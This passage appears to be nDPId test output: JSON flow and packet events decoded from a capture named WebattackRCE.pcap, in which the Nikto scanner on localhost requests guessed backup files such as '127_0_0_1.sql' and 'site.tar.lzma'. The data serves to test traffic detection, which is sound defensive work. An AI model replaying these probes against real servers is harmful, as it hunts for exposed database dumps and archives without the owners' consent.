-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1576420276920,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276920,"pkt":"AAAAAAAAAAAAAAAACABFAADFpeFAAEAGlk9\/AAABfwAAAcLKH5AnGp2SsuR1gYAYAED+uQAAAQEICp1m++CdZvvgR0VUIC8xMjcwLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1576420276922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276922,"pkt":"AAAAAAAAAAAAAAAACABFAADFIE9AAEAGG+J\/AAABfwAAAcLMH5CC7hgEsmCzLIAYAED+uQAAAQEICp1m++KdZvviR0VUIC8xMjcwLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1576420276924,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276924,"pkt":"AAAAAAAAAAAAAAAACABFAADFRxNAAEAG9R1\/AAABfwAAAcLOH5BdCH9f1fkuqIAYAED+uQAAAQEICp1m++SdZvvjR0VUIC8xMjdfMF8wXzEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1576420276925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276925,"pkt":"AAAAAAAAAAAAAAAACABFAADFQzdAAEAG+Pl\/AAABfwAAAcLQH5BEXHt7s07ta4AYAED+uQAAAQEICp1m++WdZvvlR0VUIC8xMjdfMF8wXzEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1576420276926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276926,"pkt":"AAAAAAAAAAAAAAAACABFAADIWd1AAEAG4lB\/AAABfwAAAcLSH5AL0mGV2bYy0oAYAED+vAAAAQEICp1m++adZvvmR0VUIC8xMjcuMC4wLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1576420276928,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276928,"pkt":"AAAAAAAAAAAAAAAACABFAADIwcZAAEAGemd\/AAABfwAAAcLUH5BvVfmVJOeoY4AYAED+vAAAAQEICp1m++idZvvoR0VUIC8xMjcuMC4wLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1576420276929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276929,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/L19AAEAGDNh\/AAABfwAAAcLWH5BVghcOcLaACoAYAED+swAAAQEICp1m++mdZvvpR0VUIC8xMjcudGd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1576420276932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276932,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/j\/RAAEAGrEJ\/AAABfwAAAcLYH5CKH7ek\/31EG4AYAED+swAAAQEICp1m++ydZvvsR0VUIC8xMjcudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1576420276933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276933,"pkt":"AAAAAAAAAAAAAAAACABFAADFT2BAAEAG7NB\/AAABfwAAAcLaH5CU9HcQhzdjIYAYAED+uQAAAQEICp1m++2dZvvtR0VUIC9zaXRlLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1576420276934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276934,"pkt":"AAAAAAAAAAAAAAAACABFAADFqdVAAEAGklt\/AAABfwAAAcLcH5A055GDxax\/gIAYAED+uQAAAQEICp1m++6dZvvuR0VUIC9zaXRlLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 